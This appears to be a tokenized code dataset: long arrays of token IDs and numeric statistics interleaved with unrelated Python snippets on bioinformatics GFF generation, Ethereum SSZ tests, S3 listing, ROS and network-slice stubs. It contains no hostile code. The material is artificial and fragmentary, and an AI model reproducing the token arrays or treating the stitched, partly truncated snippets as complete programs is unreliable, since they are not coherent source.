220,
220,
220,
220,
220,
220,
366,
15245,
2304,
3008,
62,
15414,
2476,
317,
5188,
13103,
284,
21136,
4645,
17311,
1,
198,
220,
220,
220,
220,
220,
220,
220,
1267,
628,
220,
220,
220,
1303,
24205,
461,
262,
1960,
519,
877,
515,
1037,
5072,
284,
804,
36597,
628,
220,
220,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
7,
198,
220,
220,
220,
220,
220,
220,
220,
6764,
28,
12417,
13,
834,
15390,
834,
11,
1296,
1436,
62,
4871,
28,
687,
1436,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
15414,
1600,
2099,
28,
2536,
11,
1037,
2625,
15414,
2393,
7268,
262,
8573,
290,
6608,
1,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
27444,
78,
1600,
366,
438,
22915,
1600,
2099,
28,
2536,
11,
1037,
2625,
15245,
2304,
3008,
5072,
2393,
287,
19449,
5794,
1,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
27444,
66,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
8968,
2364,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
2099,
28,
22468,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
8612,
378,
22037,
12,
1087,
445,
12493,
351,
262,
1813,
45616,
1600,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
1448,
796,
30751,
13,
2860,
62,
21973,
935,
62,
41195,
62,
8094,
3419,
198,
220,
220,
220,
1448,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
8807,
12,
265,
3150,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
2223,
2625,
8095,
62,
7942,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
8807,
779,
583,
12,
37696,
6608,
422,
262,
5128,
2393,
1600,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
1448,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
8807,
12,
7249,
942,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
2223,
2625,
8095,
62,
7942,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
8807,
779,
583,
12,
301,
5620,
6608,
422,
262,
5128,
2393,
1600,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7203,
438,
3672,
1600,
4277,
2625,
1600,
2099,
28,
2536,
11,
1037,
2625,
3672,
286,
262,
27039,
4943,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
11213,
1600,
4277,
2625,
1600,
2099,
28,
2536,
11,
1037,
2625,
11213,
286,
262,
27039,
1,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
41617,
1600,
299,
22046,
2625,
9,
1600,
2099,
28,
2536,
11,
4277,
41888,
4357,
1037,
2625,
4868,
286,
27039,
7035,
1,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
220,
220,
220,
220,
366,
438,
5420,
4972,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
299,
22046,
2625,
9,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
2099,
28,
2536,
11,
198,
220,
220,
220,
220,
220,
220,
220,
4277,
41888,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
1037,
2625,
4868,
286,
10288,
329,
262,
27039,
1600,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
628,
220,
220,
220,
611,
26498,
13,
8807,
62,
265,
3150,
290,
26498,
13,
8968,
2364,
318,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
7203,
438,
8807,
12,
265,
3150,
4433,
284,
1577,
1377,
8968,
2364,
4943,
198,
220,
220,
220,
611,
26498,
13,
8807,
62,
7249,
942,
290,
26498,
13,
8968,
2364,
318,
407,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
5298,
35528,
7203,
438,
8807,
12,
301,
5620,
460,
407,
307,
1813,
351,
1377,
8968,
2364,
4943,
628,
220,
220,
220,
1303,
1100,
2393,
351,
317,
5188,
290,
4781,
22820,
11655,
6608,
198,
220,
220,
220,
13431,
796,
257,
325,
62,
952,
13,
961,
7,
22046,
13,
15414,
11,
366,
25,
4943,
198,
220,
220,
220,
611,
26498,
13,
8807,
62,
7249,
942,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
5739,
287,
13431,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
1994,
287,
1351,
7,
14535,
13,
3258,
592,
13,
13083,
3419,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1994,
407,
287,
14631,
1930,
1756,
1600,
366,
77,
17024,
1,
5974,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1619,
5739,
13,
3258,
592,
58,
2539,
60,
198,
220,
220,
220,
1288,
361,
26498,
13,
8807,
62,
265,
3150,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
5739,
287,
13431,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5739,
13,
10951,
796,
23884,
628,
220,
220,
220,
1303,
5004,
5072,
2393,
1438,
6338,
611,
4814,
198,
220,
220,
220,
5072,
796,
26498,
13,
22915,
393,
26498,
13,
15414,
1343,
45434,
15245,
2304,
3008,
13,
17752,
13,
34586,
1,
628,
220,
220,
220,
3551,
62,
15414,
7,
198,
220,
220,
220,
220,
220,
220,
220,
3108,
28,
22915,
11,
198,
220,
220,
220,
220,
220,
220,
220,
13431,
28,
37805,
11,
198,
220,
220,
220,
220,
220,
220,
220,
13634,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
3672,
1298,
26498,
13,
3672,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
11213,
1298,
26498,
13,
11213,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
41617,
1298,
26498,
13,
41617,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
5420,
4972,
1298,
26498,
13,
5420,
4972,
11,
198,
220,
220,
220,
220,
220,
220,
220,
8964,
198,
220,
220,
220,
220,
220,
220,
220,
45616,
28,
22046,
13,
8968,
2364,
11,
198,
220,
220,
220,
1267,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1388,
3419,
198
] | 2.543886 | 1,333 |
import pandas as pd
import numpy as np
import argparse, sys, re
orf_names = ['ORF_ID', 'Contig', 'COG', 'KO'] #, 'product']
def merge_orf_and_funtax( orf_file, funtax_file ):
"""
Takes an orf file and a funtaxa file and returns the merge
"""
orf_df = pd.read_table(orf_file, header=None, names=orf_names, index_col='ORF_ID', usecols=orf_names, engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df = pd.read_table(funtax_file, index_col='ORF_ID', engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df[['COG','KO']] = orf_df[['COG','KO']]
funtax_df['taxonId'] = funtax_df['taxonomy'].replace(r'.+\(([0-9]+)\)', value=r'\1', regex=True)
genes = funtax_df.reset_index()
genes['gene'] = genes['ORF_ID']
return genes.set_index('gene')
def generate_gff( mapfile, funtax_orf_file ):
"""
Takes the mapfile and annotation file and generates a gff file that maps reads in the bamfile to genes
"""
annotation2assembly_map = pd.read_table(mapfile,
names=['annotation','assembly','length'],
index_col='annotation')
funtax_gff = pd.read_table( funtax_orf_file.name, engine='python', encoding='ISO-8859-1', quoting=3)
funtax_gff['seqid'] = funtax_gff.join(annotation2assembly_map, on='Contig_Name')['assembly']
funtax_gff['source'] = 'Prodigal_v2.00'
funtax_gff['type'] = 'CDS'
funtax_gff['score'] = 100.0
funtax_gff['phase'] = 0
funtax_gff['attributes'] = funtax_gff['ORF_ID'].str.replace(r'(.*)', r'ID=\1;')
return funtax_gff[['seqid','source', 'type','start', 'end', 'score', 'strand','phase','attributes']]
| [
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1822,
29572,
11,
25064,
11,
302,
198,
198,
24263,
62,
14933,
796,
37250,
1581,
37,
62,
2389,
3256,
705,
4264,
328,
3256,
705,
34,
7730,
3256,
705,
22328,
20520,
1303,
11,
705,
11167,
20520,
198,
198,
4299,
20121,
62,
24263,
62,
392,
62,
69,
2797,
897,
7,
393,
69,
62,
7753,
11,
1257,
19290,
62,
7753,
15179,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
33687,
281,
393,
69,
2393,
290,
257,
1257,
19290,
64,
2393,
290,
5860,
262,
20121,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
393,
69,
62,
7568,
796,
279,
67,
13,
961,
62,
11487,
7,
24263,
62,
7753,
11,
13639,
28,
14202,
11,
3891,
28,
24263,
62,
14933,
11,
6376,
62,
4033,
11639,
1581,
37,
62,
2389,
3256,
779,
4033,
82,
28,
24263,
62,
14933,
11,
3113,
11639,
29412,
3256,
21004,
2625,
40734,
12,
3459,
3270,
12,
16,
1600,
28411,
28,
18,
8,
198,
220,
220,
220,
1257,
19290,
62,
7568,
796,
279,
67,
13,
961,
62,
11487,
7,
69,
2797,
897,
62,
7753,
11,
6376,
62,
4033,
11639,
1581,
37,
62,
2389,
3256,
3113,
11639,
29412,
3256,
21004,
2625,
40734,
12,
3459,
3270,
12,
16,
1600,
28411,
28,
18,
8,
198,
220,
220,
220,
1257,
19290,
62,
7568,
58,
17816,
34,
7730,
41707,
22328,
6,
11907,
796,
393,
69,
62,
7568,
58,
17816,
34,
7730,
41707,
22328,
6,
11907,
198,
220,
220,
220,
1257,
19290,
62,
7568,
17816,
19290,
261,
7390,
20520,
796,
1257,
19290,
62,
7568,
17816,
19290,
30565,
6,
4083,
33491,
7,
81,
4458,
10,
59,
19510,
58,
15,
12,
24,
48688,
19415,
8,
3256,
1988,
28,
81,
6,
59,
16,
3256,
40364,
28,
17821,
8,
198,
220,
220,
220,
10812,
796,
1257,
19290,
62,
7568,
13,
42503,
62,
9630,
3419,
198,
220,
220,
220,
10812,
17816,
70,
1734,
20520,
796,
10812,
17816,
1581,
37,
62,
2389,
20520,
198,
220,
220,
220,
1441,
10812,
13,
2617,
62,
9630,
10786,
70,
1734,
11537,
628,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
4299,
7716,
62,
70,
487,
7,
3975,
7753,
11,
1257,
19290,
62,
24263,
62,
7753,
15179,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
33687,
262,
3975,
7753,
290,
23025,
2393,
290,
18616,
257,
308,
487,
2393,
326,
8739,
9743,
287,
262,
275,
321,
7753,
284,
10812,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
23025,
17,
41873,
62,
8899,
796,
279,
67,
13,
961,
62,
11487,
7,
8899,
7753,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3891,
28,
17816,
1236,
14221,
41707,
41873,
41707,
13664,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6376,
62,
4033,
11639,
1236,
14221,
11537,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
796,
279,
67,
13,
961,
62,
11487,
7,
1257,
19290,
62,
24263,
62,
7753,
13,
3672,
11,
3113,
11639,
29412,
3256,
21004,
11639,
40734,
12,
3459,
3270,
12,
16,
3256,
28411,
28,
18,
8,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
41068,
312,
20520,
796,
1257,
19290,
62,
70,
487,
13,
22179,
7,
1236,
14221,
17,
41873,
62,
8899,
11,
319,
11639,
4264,
328,
62,
5376,
11537,
17816,
41873,
20520,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
10459,
20520,
796,
705,
2964,
12894,
282,
62,
85,
17,
13,
405,
6,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
4906,
20520,
796,
220,
705,
34,
5258,
6,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
26675,
20520,
796,
1802,
13,
15,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
40715,
20520,
796,
220,
657,
198,
220,
220,
220,
1257,
19290,
62,
70,
487,
17816,
1078,
7657,
20520,
796,
1257,
19290,
62,
70,
487,
17816,
1581,
37,
62,
2389,
6,
4083,
2536,
13,
33491,
7,
81,
6,
7,
15885,
8,
3256,
374,
6,
2389,
28,
59,
16,
26,
11537,
198,
220,
220,
220,
1441,
1257,
19290,
62,
70,
487,
58,
17816,
41068,
312,
41707,
10459,
3256,
705,
4906,
41707,
9688,
3256,
705,
437,
3256,
705,
26675,
3256,
705,
2536,
392,
41707,
40715,
41707,
1078,
7657,
6,
11907,
628,
220,
220,
220,
220,
220,
220,
220,
220,
198
] | 2.210052 | 776 |
from .utils.env import make_env, GridWorldParallelEnv
| [
6738,
764,
26791,
13,
24330,
1330,
787,
62,
24330,
11,
24846,
10603,
10044,
29363,
4834,
85,
628,
198
] | 3.111111 | 18 |
from typing import Iterable
from eth2spec.gen_helpers.gen_base import gen_runner, gen_typing
import ssz_basic_vector
import ssz_bitlist
import ssz_bitvector
import ssz_boolean
import ssz_uints
import ssz_container
from eth2spec.test.helpers.constants import PHASE0
if __name__ == "__main__":
gen_runner.run_generator("ssz_generic", [
create_provider("basic_vector", "valid", ssz_basic_vector.valid_cases),
create_provider("basic_vector", "invalid", ssz_basic_vector.invalid_cases),
create_provider("bitlist", "valid", ssz_bitlist.valid_cases),
create_provider("bitlist", "invalid", ssz_bitlist.invalid_cases),
create_provider("bitvector", "valid", ssz_bitvector.valid_cases),
create_provider("bitvector", "invalid", ssz_bitvector.invalid_cases),
create_provider("boolean", "valid", ssz_boolean.valid_cases),
create_provider("boolean", "invalid", ssz_boolean.invalid_cases),
create_provider("uints", "valid", ssz_uints.valid_cases),
create_provider("uints", "invalid", ssz_uints.invalid_cases),
create_provider("containers", "valid", ssz_container.valid_cases),
create_provider("containers", "invalid", ssz_container.invalid_cases),
])
| [
6738,
19720,
1330,
40806,
540,
198,
6738,
4555,
17,
16684,
13,
5235,
62,
16794,
364,
13,
5235,
62,
8692,
1330,
2429,
62,
16737,
11,
2429,
62,
774,
13886,
198,
11748,
37786,
89,
62,
35487,
62,
31364,
198,
11748,
37786,
89,
62,
2545,
4868,
198,
11748,
37786,
89,
62,
2545,
31364,
198,
11748,
37786,
89,
62,
2127,
21052,
198,
11748,
37786,
89,
62,
28611,
82,
198,
11748,
37786,
89,
62,
34924,
198,
6738,
4555,
17,
16684,
13,
9288,
13,
16794,
364,
13,
9979,
1187,
1330,
9370,
11159,
15,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
2429,
62,
16737,
13,
5143,
62,
8612,
1352,
7203,
824,
89,
62,
41357,
1600,
685,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
35487,
62,
31364,
1600,
366,
12102,
1600,
37786,
89,
62,
35487,
62,
31364,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
35487,
62,
31364,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
35487,
62,
31364,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2545,
4868,
1600,
366,
12102,
1600,
37786,
89,
62,
2545,
4868,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2545,
4868,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
2545,
4868,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2545,
31364,
1600,
366,
12102,
1600,
37786,
89,
62,
2545,
31364,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2545,
31364,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
2545,
31364,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2127,
21052,
1600,
366,
12102,
1600,
37786,
89,
62,
2127,
21052,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
2127,
21052,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
2127,
21052,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
28611,
82,
1600,
366,
12102,
1600,
37786,
89,
62,
28611,
82,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
28611,
82,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
28611,
82,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
3642,
50221,
1600,
366,
12102,
1600,
37786,
89,
62,
34924,
13,
12102,
62,
33964,
828,
198,
220,
220,
220,
220,
220,
220,
220,
2251,
62,
15234,
1304,
7203,
3642,
50221,
1600,
366,
259,
12102,
1600,
37786,
89,
62,
34924,
13,
259,
12102,
62,
33964,
828,
198,
220,
220,
220,
33761,
198
] | 2.550308 | 487 |
#!/usr/local/bin/python3.4
import os, sys, logging, json, argparse, time, datetime, requests, uuid
from config_files import settings
#### NETWORK SLICE MANAGER/NFVO URL
JSON_CONTENT_HEADER = {'Content-Type':'application/json'}
#### REQUESTS
# returns all the slice-subnets templates in the NSM
# returns a specific slice-subnet template in the NSM
# returns all slice-subnet instances in the NSM
# returns specific slice-subnet instance in the NSM
# sends request to deploy a slice-subnet template (NST) to the NSM
# returns specific slice-subnet instance request from the NSM/NFVO
# sends request to terminate a slice-subnet template (NST) to the NSM
| [
2,
48443,
14629,
14,
12001,
14,
8800,
14,
29412,
18,
13,
19,
198,
198,
11748,
28686,
11,
25064,
11,
18931,
11,
33918,
11,
1822,
29572,
11,
640,
11,
4818,
8079,
11,
7007,
11,
334,
27112,
198,
198,
6738,
4566,
62,
16624,
1330,
6460,
628,
198,
4242,
49791,
12419,
8476,
17254,
4760,
1137,
14,
21870,
29516,
10289,
198,
40386,
62,
37815,
3525,
62,
37682,
1137,
796,
1391,
6,
19746,
12,
6030,
10354,
6,
31438,
14,
17752,
6,
92,
198,
198,
4242,
4526,
10917,
1546,
4694,
198,
2,
5860,
477,
262,
16416,
12,
7266,
45938,
24019,
287,
262,
10896,
44,
198,
198,
2,
5860,
257,
2176,
16416,
12,
7266,
3262,
11055,
287,
262,
10896,
44,
198,
198,
2,
5860,
477,
16416,
12,
7266,
3262,
10245,
287,
262,
10896,
44,
198,
198,
2,
5860,
2176,
16416,
12,
7266,
3262,
4554,
287,
262,
10896,
44,
198,
198,
2,
12800,
2581,
284,
6061,
257,
16416,
12,
7266,
3262,
11055,
357,
45,
2257,
8,
284,
262,
10896,
44,
198,
198,
2,
5860,
2176,
16416,
12,
7266,
3262,
4554,
2581,
422,
262,
10896,
44,
14,
21870,
29516,
198,
198,
2,
12800,
2581,
284,
23654,
257,
16416,
12,
7266,
3262,
11055,
357,
45,
2257,
8,
284,
262,
10896,
44,
198
] | 3.282178 | 202 |
import io
import os
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from rastervision.filesystem import (FileSystem, NotReadableError,
NotWritableError)
# Code from https://alexwlchan.net/2017/07/listing-s3-keys/
def get_matching_s3_objects(bucket, prefix='', suffix=''):
"""
Generate objects in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch objects whose key starts with
this prefix (optional).
:param suffix: Only fetch objects whose keys end with
this suffix (optional).
"""
import boto3
s3 = boto3.client('s3')
kwargs = {'Bucket': bucket}
# If the prefix is a single string (not a tuple of strings), we can
# do the filtering directly in the S3 API.
if isinstance(prefix, str):
kwargs['Prefix'] = prefix
while True:
# The S3 API response is a large blob of metadata.
# 'Contents' contains information about the listed objects.
resp = s3.list_objects_v2(**kwargs)
try:
contents = resp['Contents']
except KeyError:
return
for obj in contents:
key = obj['Key']
if key.startswith(prefix) and key.endswith(suffix):
yield obj
# The S3 API is paginated, returning up to 1000 keys at a time.
# Pass the continuation token into the next response, until we
# reach the final page (when this field is missing).
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
def get_matching_s3_keys(bucket, prefix='', suffix=''):
"""
Generate the keys in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch keys that start with this prefix (optional).
:param suffix: Only fetch keys that end with this suffix (optional).
"""
for obj in get_matching_s3_objects(bucket, prefix, suffix):
yield obj['Key']
| [
11748,
33245,
198,
11748,
28686,
198,
11748,
850,
14681,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
6738,
2956,
297,
571,
13,
29572,
1330,
19016,
29572,
198,
198,
6738,
374,
1603,
10178,
13,
16624,
6781,
1330,
357,
8979,
11964,
11,
1892,
5569,
540,
12331,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1892,
20257,
540,
12331,
8,
628,
198,
2,
6127,
422,
3740,
1378,
1000,
87,
40989,
3147,
13,
3262,
14,
5539,
14,
2998,
14,
4868,
278,
12,
82,
18,
12,
13083,
14,
198,
4299,
651,
62,
15699,
278,
62,
82,
18,
62,
48205,
7,
27041,
316,
11,
21231,
11639,
3256,
35488,
28,
7061,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2980,
378,
5563,
287,
281,
311,
18,
19236,
13,
628,
220,
220,
220,
1058,
17143,
19236,
25,
6530,
286,
262,
311,
18,
19236,
13,
198,
220,
220,
220,
1058,
17143,
21231,
25,
5514,
21207,
5563,
3025,
1994,
4940,
351,
198,
220,
220,
220,
220,
220,
220,
220,
428,
21231,
357,
25968,
737,
198,
220,
220,
220,
1058,
17143,
35488,
25,
5514,
21207,
5563,
3025,
8251,
886,
351,
198,
220,
220,
220,
220,
220,
220,
220,
428,
35488,
357,
25968,
737,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1330,
275,
2069,
18,
198,
220,
220,
220,
264,
18,
796,
275,
2069,
18,
13,
16366,
10786,
82,
18,
11537,
198,
220,
220,
220,
479,
86,
22046,
796,
1391,
6,
33,
38811,
10354,
19236,
92,
628,
220,
220,
220,
1303,
1002,
262,
21231,
318,
257,
2060,
4731,
357,
1662,
257,
46545,
286,
13042,
828,
356,
460,
198,
220,
220,
220,
1303,
466,
262,
25431,
3264,
287,
262,
311,
18,
7824,
13,
198,
220,
220,
220,
611,
318,
39098,
7,
40290,
11,
965,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
479,
86,
22046,
17816,
36698,
844,
20520,
796,
21231,
628,
220,
220,
220,
981,
6407,
25,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
383,
311,
18,
7824,
2882,
318,
257,
1588,
44812,
286,
20150,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
705,
15842,
6,
4909,
1321,
546,
262,
5610,
5563,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1217,
796,
264,
18,
13,
4868,
62,
48205,
62,
85,
17,
7,
1174,
46265,
22046,
8,
628,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10154,
796,
1217,
17816,
15842,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
7383,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
628,
220,
220,
220,
220,
220,
220,
220,
329,
26181,
287,
10154,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1994,
796,
26181,
17816,
9218,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
1994,
13,
9688,
2032,
342,
7,
40290,
8,
290,
1994,
13,
437,
2032,
342,
7,
37333,
844,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
7800,
26181,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
383,
311,
18,
7824,
318,
42208,
3898,
11,
8024,
510,
284,
8576,
8251,
379,
257,
640,
13,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
6251,
262,
24659,
11241,
656,
262,
1306,
2882,
11,
1566,
356,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3151,
262,
2457,
2443,
357,
12518,
428,
2214,
318,
4814,
737,
198,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
479,
86,
22046,
17816,
17875,
2288,
30642,
20520,
796,
1217,
17816,
10019,
17875,
2288,
30642,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
7383,
12331,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2270,
628,
198,
4299,
651,
62,
15699,
278,
62,
82,
18,
62,
13083,
7,
27041,
316,
11,
21231,
11639,
3256,
35488,
28,
7061,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
2980,
378,
262,
8251,
287,
281,
311,
18,
19236,
13,
628,
220,
220,
220,
1058,
17143,
19236,
25,
6530,
286,
262,
311,
18,
19236,
13,
198,
220,
220,
220,
1058,
17143,
21231,
25,
5514,
21207,
8251,
326,
923,
351,
428,
21231,
357,
25968,
737,
198,
220,
220,
220,
1058,
17143,
35488,
25,
5514,
21207,
8251,
326,
886,
351,
428,
35488,
357,
25968,
737,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
329,
26181,
287,
651,
62,
15699,
278,
62,
82,
18,
62,
48205,
7,
27041,
316,
11,
21231,
11,
35488,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
7800,
26181,
17816,
9218,
20520,
628
] | 2.550995 | 804 |
#
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
import can_receive
# Please see example for can_receive permission.
# By design can_receive and can_transfer permissions
# can be tested only together.
| [
2,
198,
2,
15069,
15423,
321,
19831,
1766,
1539,
12052,
13,
1439,
6923,
33876,
13,
198,
2,
30628,
55,
12,
34156,
12,
33234,
7483,
25,
24843,
12,
17,
13,
15,
198,
2,
198,
198,
11748,
460,
62,
260,
15164,
198,
198,
2,
4222,
766,
1672,
329,
460,
62,
260,
15164,
7170,
13,
198,
2,
2750,
1486,
460,
62,
260,
15164,
290,
460,
62,
39437,
21627,
198,
2,
460,
307,
6789,
691,
1978,
13,
198
] | 3.364865 | 74 |
#! /usr/bin/env python
import rospy
import fetch_api
def wait_for_time():
"""Wait for simulated time to begin.
"""
while rospy.Time().now().to_sec() == 0:
pass
if __name__ == '__main__':
main()
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
11748,
686,
2777,
88,
198,
11748,
21207,
62,
15042,
628,
198,
198,
4299,
4043,
62,
1640,
62,
2435,
33529,
198,
220,
220,
220,
37227,
21321,
329,
28590,
640,
284,
2221,
13,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
981,
686,
2777,
88,
13,
7575,
22446,
2197,
22446,
1462,
62,
2363,
3419,
6624,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1208,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.34375 | 96 |
def create_new_connection(parent_node, child_node, action, prior_probability):
"""
Returns the edge connecting parent and child
"""
edge = Edge(parent_node, child_node, action, prior_probability)
parent_node.add_outgoing_edge(edge)
child_node.add_incoming_edge(edge)
return edge
| [
628,
198,
4299,
2251,
62,
3605,
62,
38659,
7,
8000,
62,
17440,
11,
1200,
62,
17440,
11,
2223,
11,
3161,
62,
1676,
65,
1799,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
16409,
262,
5743,
14320,
2560,
290,
1200,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5743,
796,
13113,
7,
8000,
62,
17440,
11,
1200,
62,
17440,
11,
2223,
11,
3161,
62,
1676,
65,
1799,
8,
198,
220,
220,
220,
2560,
62,
17440,
13,
2860,
62,
448,
5146,
62,
14907,
7,
14907,
8,
198,
220,
220,
220,
1200,
62,
17440,
13,
2860,
62,
259,
4976,
62,
14907,
7,
14907,
8,
198,
220,
220,
220,
1441,
5743,
198
] | 2.792793 | 111 |
"""skedding.py weightless thread scheduling
"""
